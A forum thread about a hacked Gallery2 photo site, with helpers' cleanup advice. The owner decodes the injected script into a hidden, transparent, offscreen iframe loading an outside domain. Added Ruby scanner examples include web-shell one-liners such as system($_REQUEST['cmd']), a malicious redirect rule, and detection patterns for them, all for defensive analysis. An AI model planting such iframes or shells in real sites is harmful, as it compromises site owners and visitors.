Author Topic: Avast says my Gallery2 website is infected with a Trojan, please help!  (Read 17079 times)


SanderP

  • Guest

Hi,

I have several web sites, one of them a gallery with my astronomical images. Yesterday I posted a new picture I took a few days ago and someone warned me that Avast says my site is infected with a Trojan. Then someone else reported the same, also with Avast. I use two different (nameless :) virus scanners on my PCs and they don't see a problem. Clearly I want to exterminate any infections in my site but I also don't want false positives to keep people away. Could someone from Avast please have a look? I googled the subject and searched this site but didn't see it reported before.

This is the link: http://gallery.tungstentech.com/main.php?g2_itemId=1406

Thanks!

Offline Lisandro

  • Avast team
  • Certainly Bot
  • *
  • Posts: 67194
Generally, avast detection is accurate in these cases.
Isn't it an encrypted/obfuscated script or iframe?
Wasn't the site hacked?

I'll take a look into its code...
The best things in life are free.

Offline Lisandro

  • Avast team
  • Certainly Bot
  • *
  • Posts: 67194
Yeah, the site was hacked...
At the end of the page, there is an encrypted script...

</body>
</html><script type="text/javascript">var eMCeGjolMPJFNuucZWLk = ... ... continues.
The best things in life are free.

SanderP

  • Guest
Wow, that's terrible. Thanks! I'll fix it asap and have taken my site offline for now.

Offline DavidR

  • Avast Überevangelist
  • Certainly Bot
  • *****
  • Posts: 89129
  • No support PMs thanks
You also need to address why you got hacked and close the vulnerability or 'I'll be back.'

- This is commonly down to old content management software being vulnerable; see this example of a host's response to a hacked site.
Quote
We have patched up the server and we found a weakness in PHP which was helping aid the compromise of some domains. We updated it, and changed some default settings to help prevent these coding compromises. The weaknesses were not server wide but rather just made it easier on a hacker to compromise individual end user accounts.

I suggest the following clean up procedure for both your accounts:

1. Check all index pages for any signs of JavaScript injected into their coding. On Windows servers check any "default.aspx" or "default.cfm" pages as those are popular targets too.

2. Remove any "rogue" files or PHP scripts uploaded by the hackers into your account. Such scripts allowed them to make account-wide changes, spam through your account, or spread their own .htaccess files through all of your domains in that end user.

3. Check all .htaccess files, as hackers like to load redirects into them.

4. Change all passwords for that end user account: the cp password, the ftp password, and any ftp sub accounts. Make sure to use a "strong" password which includes upper case, lower case, numbers and NO COMPLETE WORDS OR NAMES!

This coupled with our server side changes should prevent any resurfacing of the hackers' efforts. In some cases you may still have coding which allows for injection. All user input fields, hidden or not, should be hard coded, filtered, and sanitized before being handed off to PHP or a database, which will prevent coding characters from being submitted and run through your software.


Also see, Tips for Cleaning & Securing Your Website, http://www.stopbadware.org/home/security.

Also see forum topic, http://forum.avast.com/index.php?topic=45458.0.
Windows 10 Home 64bit/ Acer Aspire F15/ Intel Core i5 7200U 2.5GHz, 8GB DDR4 memory, 256GB SSD, 1TB HDD/ avast! free 24.4.6112 (build 24.4.9067.762) UI 1.0.803/ Firefox, uBlock Origin, uMatrix/ MailWasher Pro/ Avast! Mobile Security
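The host's four-step checklist quoted above, turned into a script as an added example (this is not code from the thread, from Avast, or from Gallery2): it walks a web root and flags what the list tells you to look for, namely a script appended after `</html>` on page files, PHP files that run `eval(base64_decode(...))` or pass a request parameter straight to a shell, `.htaccess` rules that redirect to an external URL, and files modified after a date you supply (your last known-good deploy). The indicator regexes are my own assumptions about common injection styles, not a signature set, and the sample web root it builds in a temporary directory is constructed for the example.

```ruby
require "find"
require "fileutils"
require "tmpdir"

# Indicators drawn from the host's checklist. These regexes are assumptions
# about common injection styles, not a complete signature set, so treat a hit
# as "open this file and look", not as proof of compromise.
TRAILING_SCRIPT   = %r{</html>\s*<script\b}i               # script appended after the document ends
OBFUSCATED_PHP    = /\b(eval|assert)\s*\(\s*(base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(/i
WEBSHELL_CALL     = /\b(system|passthru|shell_exec|exec|popen)\s*\(\s*\$_(POST|GET|REQUEST|COOKIE)\b/i
HTACCESS_REDIRECT = %r{^\s*(RewriteRule|Redirect(Match|Permanent)?)\b.*\bhttps?://}i

PAGE_EXTENSIONS = %w[.php .phtml .html .htm].freeze

# Returns the list of indicators that fire on a single file.
def scan_file(path)
  content = File.read(path, mode: "rb")
  ext = File.extname(path).downcase
  findings = []
  findings << :htaccess_redirect if File.basename(path) == ".htaccess" && content =~ HTACCESS_REDIRECT
  findings << :trailing_script   if PAGE_EXTENSIONS.include?(ext) && content =~ TRAILING_SCRIPT
  findings << :obfuscated_php    if ext.start_with?(".ph") && content =~ OBFUSCATED_PHP
  findings << :webshell_call     if ext.start_with?(".ph") && content =~ WEBSHELL_CALL
  findings
end

# Walks the web root and maps relative path => indicators. Files changed after
# `modified_since` (e.g. your last known-good deploy) are flagged as well,
# because an attacker's uploads and edits are usually newer than the rest.
def scan_site(root, modified_since: nil)
  results = {}
  Find.find(root) do |path|
    next unless File.file?(path)
    findings = scan_file(path)
    findings << :recently_modified if modified_since && File.mtime(path) > modified_since
    results[path[(root.length + 1)..-1]] = findings unless findings.empty?
  end
  results
end

# Constructed sample web root standing in for a hacked Gallery2 install. The
# contents are made up for this example: the trailing script is a stub of the
# one quoted in the thread, the PHP files imitate typical dropped scripts.
def build_sample_site(root)
  FileUtils.mkdir_p(File.join(root, "g2data", "tmp"))
  File.write(File.join(root, "index.php"),
             "<html><body>gallery</body>\n</html><script type=\"text/javascript\">var eMCeGjolMPJFNuucZWLk = \"jc60jc105\";</script>\n")
  File.write(File.join(root, "main.php"), "<?php echo 'clean page'; ?>\n")
  File.write(File.join(root, ".htaccess"),
             "RewriteEngine On\nRewriteCond %{HTTP_REFERER} google\nRewriteRule .* http://you-found-it.example/index.php [R,L]\n")
  File.write(File.join(root, "g2data", "tmp", "img.php"),
             "<?php eval(base64_decode($_POST['c'])); ?>\n")
  File.write(File.join(root, "g2data", "tmp", "up.php"),
             "<?php if (isset($_REQUEST['cmd'])) { system($_REQUEST['cmd']); } ?>\n")
end

if __FILE__ == $PROGRAM_NAME
  Dir.mktmpdir do |root|
    build_sample_site(root)
    scan_site(root).sort.each { |file, hits| puts "#{file}: #{hits.join(', ')}" }
  end
end
```

Run it against a copy of the real web root with `scan_site("/path/to/htdocs", modified_since: Time.new(2010, 1, 1))` and review every hit by hand; the point of the `modified_since` flag is that a dropped uploader or a rewritten `.htaccess` will usually be the only recent files in an otherwise static install. Pair the scan with step 4 of the checklist (rotate the control panel and FTP passwords), since a cleaned tree is reinfected within hours if the attacker still has credentials.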

SanderP

  • Guest
Yes, naturally.

Offline polonus

  • Avast Überevangelist
  • Probably Bot
  • *****
  • Posts: 33916
  • malware fighter
Hi SanderP,

I get this error code:
Code:
HEAVILY EDITED BY ME!^h2 Configuration Error: Missing Theme ^/h2^
^/div^
^div class="gbBl*ck"...^
^h3> Missing Theme .../h3^
 ^p class="giDescripti*n"^
This album is configured to use the ^b>carbon</b^
 theme, but it is either inactive, not installed, or incompatible.
To fix this problem you can either ^...a href="main.php?g2_view=core.UserAdmin&g2_subView=c*re.UserLogin&g2_return=%2Fmain.php%3Fg2_view%3Dcore.ShowItemError%26g2_problem%3DmissingTheme%26g2_itemId%3D1406%26"...^
login^/a> and then <a href="main.php?g2_view=core.ItemAdmin&g2_subView=c*re.ItemEdit&g2_editPlugin=ItemEditAlbum&g2_itemId=1405&g2_return=%2Fmain.php%3Fg2_view%3Dcore.ShowItemError%26g2_problem%3DmissingTheme%26g2_itemId%3D1406%26"^.................
choose a new theme for this album^/a> or <a href="main.php?g2_view=c*re.UserAdmin&g2_subView=c*re.UserLogin&...........
g2_return=%2Fmain.php%3Fg2_view%3Dcore.ShowItemError%26g2_pr*blem%3DmissingTheme%26g2_itemId%3D1406%26"^
login as a site administrat*r</a> and then <a href="main.php?g2_view=c*re.SiteAdmin&g2_subView=core.AdminPlugins&g2_mode=c*nfig&...............g2_return=%2Fmain.php%3Fg2_view%3Dcore.Sh*wItemError%26g2_problem%3DmissingTheme%26g2_itemId%3D1406%26"^
install or activate this theme^/a^
You are familiar with this, probably the loading of the redirect?

polonus
Cybersecurity is more of an attitude than anything else. Avast Evangelists.

Use NoScript, a limited user account and a virtual machine and be safe(r)!

SanderP

  • Guest
Hi,

I don't see that error right now. I just installed the latest Gallery2 code and was able to upgrade the database. Things look good and I verified that the javascript is no longer being emitted. I'll be taking further precautions, naturally. Do you still see it?

Thanks,

  Sander

Offline polonus

  • Avast Überevangelist
  • Probably Bot
  • *****
  • Posts: 33916
  • malware fighter
Hi SanderP,

I checked again using the bad stuff detector, and this time I could not detect the failcode.
This is what you have to check now:
Results from 22.10 Dutch local time - Central European Time -
No zeroiframes detected!
Check took 10.05 seconds

(Level: 0) Url checked:
hxtp://gallery.tungstentech.com/main.php?g2_itemId=1406
Zeroiframes detected on this site: 0
No ad codes identified

(Level: 1) Url checked: (script source)
hxtp://gallery.tungstentech.com/main.php?g2_view=core.combinedjavascript&g2_key=5d713f3ae3d3f2c55383cb50739371e9
Blank page / could not connect
No ad codes identified

(Level: 1) Url checked: (script source)
hxtp://gallery.tungstentech.com/themes/carbon/theme.js
Zeroiframes detected on this site: 0
No ad codes identified

Please adapt the links you gave in your postings to make them non-clickable for the curious of nature, like I did above, using either hxtp:// or wXw.

polonus
Cybersecurity is more of an attitude than anything else. Avast Evangelists.

Use NoScript, a limited user account and a virtual machine and be safe(r)!

SanderP

  • Guest
I will do that, good idea.

CharleyO

  • Guest
***

Here is something else to consider :

Quote

I use two different (nameless :) virus scanners on my PCs and they don't see a problem.


This may be why your computer does not detect this problem.


***

Offline polonus

  • Avast Überevangelist
  • Probably Bot
  • *****
  • Posts: 33916
  • malware fighter
Hi CharleyO,

This could be true: if there are two resident virus scanners they will interfere with each other and alert on each other's signatures. A resident scanner like avast combined with a non-resident scanner like DrWeb CureIt or a standalone AV scanner like McAfee's stinger.exe etc. poses no problems.

So the mistake made here is thinking that more of the same is better; the same mistake can be made with software firewalls. It is like two dogs guarding a house: instead of guarding the house, they start to fight each other while the malcreant sneaks in.

polonus
Cybersecurity is more of an attitude than anything else. Avast Evangelists.

Use NoScript, a limited user account and a virtual machine and be safe(r)!

SanderP

  • Guest
Eh, yeah. I'm not that much of a noob you know :) I meant two different PCs, two different virus scanners. My company uses Symantec corporate and I use something else.

Offline polonus

  • Avast Überevangelist
  • Probably Bot
  • *****
  • Posts: 33916
  • malware fighter
Hi SanderP,

No offense meant; you will be OK as soon as you are familiar with where to look on the site for the malcode infection. This can help for check-ups: http://www.blacklistdoctor.com/bld/diagnose.php
There aren't a lot of AV vendors that have set out to their users that there is a big difference between general (OS- and software-independent) malcode and OS- and software-specific malware; they are often presented and swept together for obvious reasons. But to better analyze malcode of all sorts we should consider and determine under what category it comes, also to better evaluate the vector payload. Thanks again for reporting, and for providing the malware fighter's challenge,

polonus
Cybersecurity is more of an attitude than anything else. Avast Evangelists.

Use NoScript, a limited user account and a virtual machine and be safe(r)!

SanderP

  • Guest
I converted the jscript to Ruby to see what it does. The iframe gets its source from you - found - it . org (no spaces), which thankfully is suspended according to whois. I tried to get the page with wget and it timed out. So luckily the infection has been harmless for at least a while.

Here is the ruby equivalent of the code. Naturally the puts was a document . write to add the iframe:

Code:
enc_str = "jc60jc105jc102jc114jc97jc109jc101jc32jc119jc105jc100jc116jc104jc61jc34jc52jc56jc48jc34jc32jc104jc101jc105jc103jc104jc116jc61jc34jc54jc48jc34jc32jc115jc114jc99jc61jc34jc104jc116jc116jc112jc58jc47jc47jc121jc111jc117jc45jc102jc111jc117jc110jc100jc45jc105jc116jc46jc111jc114jc103jc47jc105jc110jc100jc101jc120jc46jc112jc104jc112jc34jc32jc115jc116jc121jc108jc101jc61jc34jc98jc111jc114jc100jc101jc114jc58jc48jc112jc120jc59jc32jc112jc111jc115jc105jc116jc105jc111jc110jc58jc114jc101jc108jc97jc116jc105jc118jc101jc59jc32jc116jc111jc112jc58jc48jc112jc120jc59jc32jc108jc101jc102jc116jc58jc45jc53jc48jc48jc112jc120jc59jc32jc111jc112jc97jc99jc105jc116jc121jc58jc48jc59jc32jc102jc105jc108jc116jc101jc114jc58jc112jc114jc111jc103jc105jc100jc58jc68jc88jc73jc109jc97jc103jc101jc84jc114jc97jc110jc115jc102jc111jc114jc109jc46jc77jc105jc99jc114jc111jc115jc111jc102jc116jc46jc65jc108jc112jc104jc97jc40jc111jc112jc97jc99jc105jc116jc121jc61jc48jc41jc59jc32jc45jc109jc111jc122jc45jc111jc112jc97jc99jc105jc116jc121jc58jc48jc34jc62jc60jc47jc105jc102jc114jc97jc109jc101jc62"

# Each character is stored as its decimal code point, prefixed with "jc".
# split("jc") yields a leading empty string (the string starts with "jc"),
# and "".to_i.chr would be a NUL byte, so empty pieces are dropped.
out_str = enc_str.split("jc").reject(&:empty?).map { |num| num.to_i.chr }.join

puts out_str
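To show what the "zeroiframes" check polonus ran is looking for, here is an added example (not from the original posts) that takes the decoded output of the script above and explains why it counts as a hidden, off-site iframe. The decoded tag is reproduced as a string constant so the script runs offline; the hiding rules, the `site_host` parameter, and the benign comparison frame are my own assumptions for the example.

```ruby
require "uri"

# Decoded output of the document.write payload from the post above, reproduced
# as a plain string so this example runs offline (the domain is the one the
# post names, written out in full).
DECODED_IFRAME = '<iframe width="480" height="60" src="http://you-found-it.org/index.php" ' \
                 'style="border:0px; position:relative; top:0px; left:-500px; opacity:0; ' \
                 'filter:progid:DXImageTransform.Microsoft.Alpha(opacity=0); -moz-opacity:0">' \
                 '</iframe>'

# Returns one attribute hash per <iframe ...> tag in an HTML fragment
# (double-quoted attributes only, which is all this payload uses).
def iframes_in(html)
  html.scan(/<iframe\b([^>]*)>/i).map do |(attrs)|
    attrs.scan(/([\w-]+)\s*=\s*"([^"]*)"/).map { |k, v| [k.downcase, v] }.to_h
  end
end

# Parses an inline style ("a:b; c:d") into a hash of lower-cased declarations.
def parse_style(style)
  style.to_s.split(";").each_with_object({}) do |decl, h|
    k, v = decl.split(":", 2)
    h[k.strip.downcase] = v.strip.downcase unless v.nil?
  end
end

# Lists the ways an iframe is concealed from the visitor. The rules are
# assumptions about how injected frames are typically hidden; a legitimate
# tracking pixel can trip :zero_size too, so weigh these together with where
# the src points.
def hidden_reasons(attrs)
  style = parse_style(attrs["style"])
  reasons = []
  reasons << :zero_size   if %w[width height].any? { |d| attrs.key?(d) && attrs[d].to_i <= 0 }
  reasons << :transparent if style["opacity"] == "0" || style["-moz-opacity"] == "0" ||
                             style["filter"].to_s.include?("opacity=0")
  reasons << :offscreen   if %w[left top].any? { |p| style[p].to_i < 0 }
  reasons << :invisible   if style["visibility"] == "hidden" || style["display"] == "none"
  reasons
end

# Classifies every iframe in the fragment: where it loads from, whether that is
# a different host than the site itself, and why (if at all) it is hidden.
def classify(html, site_host:)
  iframes_in(html).map do |attrs|
    host = attrs["src"] && (URI.parse(attrs["src"]).host rescue nil)
    { src: attrs["src"], external: !host.nil? && host != site_host, hidden: hidden_reasons(attrs) }
  end
end

if __FILE__ == $PROGRAM_NAME
  classify(DECODED_IFRAME, site_host: "gallery.tungstentech.com").each do |f|
    puts "#{f[:src]} external=#{f[:external]} hidden=#{f[:hidden].join(',')}"
  end
end
```

The payload is not zero-sized (480 by 60), which is why a check that only looks for `width="0"` frames misses it; it is hidden by `opacity:0` (with the IE `filter` and `-moz-opacity` equivalents for older browsers) and pushed 500px off the left edge. An iframe that is both concealed and loaded from a host other than the site's own is the combination that should never occur in a legitimate page, and it is what a scanner like the one polonus used reports.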